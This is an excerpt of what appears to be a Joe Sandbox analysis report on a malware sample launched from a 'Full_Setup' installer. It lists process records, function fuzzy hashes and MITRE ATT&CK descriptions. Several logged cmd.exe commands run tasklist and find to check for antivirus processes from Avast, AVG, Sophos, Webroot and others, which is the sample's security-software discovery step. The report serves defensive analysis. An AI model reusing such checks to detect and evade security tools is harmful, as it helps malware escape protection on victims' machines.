Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:49:14
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"
Imagebase:	0x7ff717310000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:49:14
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:49:14
Start date:	05/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Imagebase:	0x7ff634a10000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:49:14
Start date:	05/01/2025
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "wrsa.exe"
Imagebase:	0x7ff7f3220000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	11:49:14
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"
Imagebase:	0x7ff717310000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:49:14
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:49:14
Start date:	05/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Imagebase:	0x7ff634a10000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:49:14
Start date:	05/01/2025
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "opssvc.exe"
Imagebase:	0x7ff7f3220000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:49:14
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"
Imagebase:	0x7ff717310000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	11:49:14
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	11:49:14
Start date:	05/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Imagebase:	0x7ff634a10000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	11:49:14
Start date:	05/01/2025
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "avastui.exe"
Imagebase:	0x7ff7f3220000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:49:15
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"
Imagebase:	0x7ff717310000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:49:15
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:49:15
Start date:	05/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Imagebase:	0x7ff634a10000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	11:49:15
Start date:	05/01/2025
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "avgui.exe"
Imagebase:	0x7ff7f3220000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	11:49:15
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"
Imagebase:	0x7ff717310000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	11:49:15
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	11:49:15
Start date:	05/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Imagebase:	0x7ff634a10000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	11:49:15
Start date:	05/01/2025
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "nswscsvc.exe"
Imagebase:	0x7ff7f3220000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	11:49:15
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"
Imagebase:	0x7ff717310000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	11:49:15
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	11:49:15
Start date:	05/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Imagebase:	0x7ff634a10000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	11:49:15
Start date:	05/01/2025
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "sophoshealth.exe"
Imagebase:	0x7ff7f3220000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	11:49:21
Start date:	05/01/2025
Path:	C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
Imagebase:	0x400000
File size:	846'325'235 bytes
MD5 hash:	6A8860A8150021B2D5B9BB707DE4FA37
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 03682618 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2016571437.000000000367E000.00000004.00000800.00020000.00000000.sdmp, Offset: 03681000, based on PE: false

Associated: 00000000.00000003.1945479018.000000000367F000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_367c000_Full_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c38c0da48f040ebe2960d535c249fa6cf09b94d0eab1a889658c975e8b700ac
Instruction ID: 3da1c521e3aef61f88a0784f2bad63b93ca3441f202669c6382dcdf198bea8b3
Opcode Fuzzy Hash: 6c38c0da48f040ebe2960d535c249fa6cf09b94d0eab1a889658c975e8b700ac
Instruction Fuzzy Hash: 28F1216280E3C15FC7038B708C79691BFB1AE27204B1E8ACFC4C58F9E3D659595AD362

Function 03682618 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2016571437.000000000367E000.00000004.00000800.00020000.00000000.sdmp, Offset: 03682000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_367c000_Full_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c38c0da48f040ebe2960d535c249fa6cf09b94d0eab1a889658c975e8b700ac
Instruction ID: 3da1c521e3aef61f88a0784f2bad63b93ca3441f202669c6382dcdf198bea8b3
Opcode Fuzzy Hash: 6c38c0da48f040ebe2960d535c249fa6cf09b94d0eab1a889658c975e8b700ac
Instruction Fuzzy Hash: 28F1216280E3C15FC7038B708C79691BFB1AE27204B1E8ACFC4C58F9E3D659595AD362

Function 03682618 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2016571437.000000000367E000.00000004.00000800.00020000.00000000.sdmp, Offset: 0367C000, based on PE: false

Associated: 00000000.00000003.1876562822.000000000367C000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_367c000_Full_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b203dcbe2f6efd8abe831d90bd29e8f6e64e88dc1bb2e2e4001dc62fb6a9ed55
Instruction ID: 3da1c521e3aef61f88a0784f2bad63b93ca3441f202669c6382dcdf198bea8b3
Opcode Fuzzy Hash: b203dcbe2f6efd8abe831d90bd29e8f6e64e88dc1bb2e2e4001dc62fb6a9ed55
Instruction Fuzzy Hash: 28F1216280E3C15FC7038B708C79691BFB1AE27204B1E8ACFC4C58F9E3D659595AD362

Analysis Process: powershell.exePID: 6524, Parent PID: 7048COMMON

Executed Functions

Function 078D1798 Relevance: 17.1, Strings: 13, Instructions: 827COMMON

Download Yara Rule

Strings

$^q, xrefs: 078D17D0
4'^q, xrefs: 078D1999
4'^q, xrefs: 078D1F00
tP^q, xrefs: 078D1821
4'^q, xrefs: 078D19A5
l, xrefs: 078D187F
$^q, xrefs: 078D17AA
4'^q, xrefs: 078D1DB0
l, xrefs: 078D188D
tP^q, xrefs: 078D1815
4'^q, xrefs: 078D1DA6
4'^q, xrefs: 078D1F0A
$^q, xrefs: 078D17DC

Memory Dump Source

Source File: 00000004.00000002.1977011724.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$l$l
API String ID: 0-3523112644
Opcode ID: bb5fdfb422aa3b57aaea549f3c33415d34ff5672e3c910df130a9596b55409c1
Instruction ID: 71fe01dca9d3d7172b89b33384fab7669d30c708fe29b2703307b9f6ff479150
Opcode Fuzzy Hash: bb5fdfb422aa3b57aaea549f3c33415d34ff5672e3c910df130a9596b55409c1
Instruction Fuzzy Hash: 6B4257B1F043098FCB259F6988186AABFA2AFE6324F1584AAD545CF351DB31CC45C7A1

Function 04DA5E30 Relevance: .5, Instructions: 492COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1962700565.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4da0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 846a0d89a2143c0c138c612e48b727236c11d45dc1748a5dee133f20f3789c14
Instruction ID: 304886837f8c8c411e866bb817deae7bbfc51e2510ccd19d041cea743d6d0d83
Opcode Fuzzy Hash: 846a0d89a2143c0c138c612e48b727236c11d45dc1748a5dee133f20f3789c14
Instruction Fuzzy Hash: 89121774A00209DFCB14CF98D594AAEBBF2FF88310F298559E845AB365C735ED91CB90

Function 04DA4998 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1962700565.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4da0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a042d0b74797b39a2de984786ec28ca05939c95f676801ddc495c78be56812a
Instruction ID: e09f88c4041052ac8daf17055234095e1719163f445a7b891b7aaf66e9473c03
Opcode Fuzzy Hash: 5a042d0b74797b39a2de984786ec28ca05939c95f676801ddc495c78be56812a
Instruction Fuzzy Hash: 30D1AF34A052489FCB06CFA8D490ADDFBB2BF49314F25819AE444AB366C771ED55CB90

Function 04DA2AB0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1962700565.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4da0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 862b1637e1e3dfe7424a29986ae2322135b6a70a7bbbec4414b4637c284bd308
Instruction ID: fce43c49fc8365e702e2c293101fa81eff65ed5d54aaf1e2e2a279c3ebe79318
Opcode Fuzzy Hash: 862b1637e1e3dfe7424a29986ae2322135b6a70a7bbbec4414b4637c284bd308
Instruction Fuzzy Hash: 0D210774A006099FCB05CF59C9809AEFBB1FF49310B248596E419EB365C735FC51CBA0

Function 04DA2AAA Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1962700565.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4da0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 934953431377de3296da08de3c7e79a870eefba53d2153303e40971821a36233
Instruction ID: b76949d1a133d93a60f3fd77bd657c7419708f70370d3300e09a804fa678aec6
Opcode Fuzzy Hash: 934953431377de3296da08de3c7e79a870eefba53d2153303e40971821a36233
Instruction Fuzzy Hash: 1521C274A006099FCB04DF99C580AAEFBF1FF48310B2485A9E919AB365C731EC51CBA0

Function 0310D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1962014604.000000000310D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0310D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_310d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a67ef91fee06060df5478af9ea2f8ea031b00d7597c601d1264794b72820c872
Instruction ID: 7236c1d51000c38f2444574fdf51fcdd8ffdbd26c8f576f1ce0c122a56376574
Opcode Fuzzy Hash: a67ef91fee06060df5478af9ea2f8ea031b00d7597c601d1264794b72820c872
Instruction Fuzzy Hash: 8A01D4714093409BE7108A65DA84767BF9CEF49324F1CC469EC4C4A18AC7B99881C6B1

Function 04DA491B Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1962700565.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4da0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1273006c08839a12e77def5704abf1ffa382c580d6f9721bf98b2abfcc88776f
Instruction ID: 6ca4e3e99d0ee626ffaca3df2a3ae25dada7e2081c6659b42653964424667dfe
Opcode Fuzzy Hash: 1273006c08839a12e77def5704abf1ffa382c580d6f9721bf98b2abfcc88776f
Instruction Fuzzy Hash: 7D018478B402159FCB00CB98C4906ADF771FF8E300B208159D45A9B365C635EC078B50

Function 0310D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1962014604.000000000310D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0310D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_310d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30bc017e62e73694da8612ead9529e9bb4fdf671a6084ec1d07d4a62a274cbd7
Instruction ID: 774b2edcd256a6c18042068b3193e2c306af692088741cc154897baff40450df
Opcode Fuzzy Hash: 30bc017e62e73694da8612ead9529e9bb4fdf671a6084ec1d07d4a62a274cbd7
Instruction Fuzzy Hash: F301407140E3C09FD7128B25D994B52BFB8EF47224F1D80CBD8888F1A7C2699848C772

Function 04DA34F6 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1962700565.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4da0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b603d2384b802a78c5e3db622bd01281decb97c569592619437551dc6ca8cef5
Instruction ID: 2727010bea42ffcd1a6ab48fef192b8b08506923a1d0b95aa0fcbd72eedb2256
Opcode Fuzzy Hash: b603d2384b802a78c5e3db622bd01281decb97c569592619437551dc6ca8cef5
Instruction Fuzzy Hash: 12F0DA35A001059FCB15CF9DD994AEEF7B1FF88324F208159E515A72A1C736EC62CB50

Non-executed Functions

Function 078D08A0 Relevance: 11.6, Strings: 9, Instructions: 310COMMON

Download Yara Rule

Strings

tP^q, xrefs: 078D0AED
4'^q, xrefs: 078D09A2
4'^q, xrefs: 078D09AE
l, xrefs: 078D0B57
l, xrefs: 078D0B65
$^q, xrefs: 078D0AB4
$^q, xrefs: 078D0AA8
tP^q, xrefs: 078D0AF9
$^q, xrefs: 078D0A82

Memory Dump Source

Source File: 00000004.00000002.1977011724.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$l$l
API String ID: 0-671944917
Opcode ID: a8a30c625c25e2798660cc2c43b7c1fbe16a0462fcea749d07f4ee43c80fa3f6
Instruction ID: cbd57bfc00ffe0b611992f1a9bd0c994b19ebb9991df9f5bb4df9fca25d2abed
Opcode Fuzzy Hash: a8a30c625c25e2798660cc2c43b7c1fbe16a0462fcea749d07f4ee43c80fa3f6
Instruction Fuzzy Hash: B0A188B2B0431A9FD7259E79980076ABFE6AFD2224F1484BBD445CF351DA32CC45C7A1

Function 078D14E8 Relevance: 8.9, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

$^q, xrefs: 078D169A
l, xrefs: 078D16DD
4'^q, xrefs: 078D159E
4'^q, xrefs: 078D1592
l, xrefs: 078D16EB
$^q, xrefs: 078D16A6
$^q, xrefs: 078D166F

Memory Dump Source

Source File: 00000004.00000002.1977011724.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$l$l
API String ID: 0-1462244110
Opcode ID: 8a780b7d6869e303deda07ced526275247b106062ae347e81ea2bf96543ac0b2
Instruction ID: 61707c80dd29ccec7765347527fad9f0c0a1659ff3d0e3639ec1d93351ada6c5
Opcode Fuzzy Hash: 8a780b7d6869e303deda07ced526275247b106062ae347e81ea2bf96543ac0b2
Instruction Fuzzy Hash: F7512AB1F0430E8FCB345EAD9808766BBB6AFE2710F19847AD456CB251DA35CC85CB61

Function 078D3D70 Relevance: 7.9, Strings: 6, Instructions: 436COMMON

Download Yara Rule

Strings

4'^q, xrefs: 078D3EA5
4'^q, xrefs: 078D41DB
4'^q, xrefs: 078D3EAF
4'^q, xrefs: 078D403E
4'^q, xrefs: 078D41E7
4'^q, xrefs: 078D4048

Memory Dump Source

Source File: 00000004.00000002.1977011724.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-2822668367
Opcode ID: ca43737134580a1fa181435b5e92a9e9ea5782d298ec08f438fb640dc4fd700f
Instruction ID: 1869961ba26780ee0c3c3cafbdbc224cb4ead947ed2e085fd71cf05212d266a3
Opcode Fuzzy Hash: ca43737134580a1fa181435b5e92a9e9ea5782d298ec08f438fb640dc4fd700f
Instruction Fuzzy Hash: FFE12BB1B0424ACFCF25DF68D44466ABBF2AFA5214F2480BAD809CF655DB31CC45C7A2

Function 078D2188 Relevance: 6.6, Strings: 5, Instructions: 337COMMON

Download Yara Rule

Strings

0U^q, xrefs: 078D21A3
tP^q, xrefs: 078D2317
tP^q, xrefs: 078D230B
4'^q, xrefs: 078D24A5
4'^q, xrefs: 078D2499

Memory Dump Source

Source File: 00000004.00000002.1977011724.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: 0U^q$4'^q$4'^q$tP^q$tP^q
API String ID: 0-3403999814
Opcode ID: 0a6dc8520f37597901bf840b99ea6880663487420de7a4fe556a6db7272b1d69
Instruction ID: ad74b38bca35ad6c5dd738a0b724966ad5353b17e17c9683492edbcd9c378175
Opcode Fuzzy Hash: 0a6dc8520f37597901bf840b99ea6880663487420de7a4fe556a6db7272b1d69
Instruction Fuzzy Hash: 00B16AB1B442058FC728DF689448A6AFBE6BFD5324F14C47AD509CB355DA32CC42C761

Function 078D3518 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 078D3574
$^q, xrefs: 078D352A
$^q, xrefs: 078D3546
$^q, xrefs: 078D3580

Memory Dump Source

Source File: 00000004.00000002.1977011724.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 005ad87cc8d0fb092c66d4c224b4f005080acbb53d1ebf6edd70d2e0621ded3e
Instruction ID: 7a4772b5948d42163fa19907db40da7b8b05f8f1044b63e006d4d85d0eff85ed
Opcode Fuzzy Hash: 005ad87cc8d0fb092c66d4c224b4f005080acbb53d1ebf6edd70d2e0621ded3e
Instruction Fuzzy Hash: 262127B170030ADBDB38596E9801B27BFEA5BE4718F24843AA409CB785DD36DC44C362

Function 078D0570 Relevance: 5.1, Strings: 4, Instructions: 53COMMON

Download Yara Rule

Strings

4'^q, xrefs: 078D05E7
4'^q, xrefs: 078D05DB
$^q, xrefs: 078D05C6
$^q, xrefs: 078D05BA

Memory Dump Source

Source File: 00000004.00000002.1977011724.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 7f684f519ef2a25b942d5d6ace4db5c2e76d7a0bc3a7a2763c8e12a9e2f3f6da
Instruction ID: 58e7f079cac7e296cabd30d2003d62128f8bfa61e14d8a88d5a693c403254242
Opcode Fuzzy Hash: 7f684f519ef2a25b942d5d6ace4db5c2e76d7a0bc3a7a2763c8e12a9e2f3f6da
Instruction Fuzzy Hash: 310170B1B4434D4FC73D5A2C08148197FB65FE2550B25059FC451EF39ACF21CD498766

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
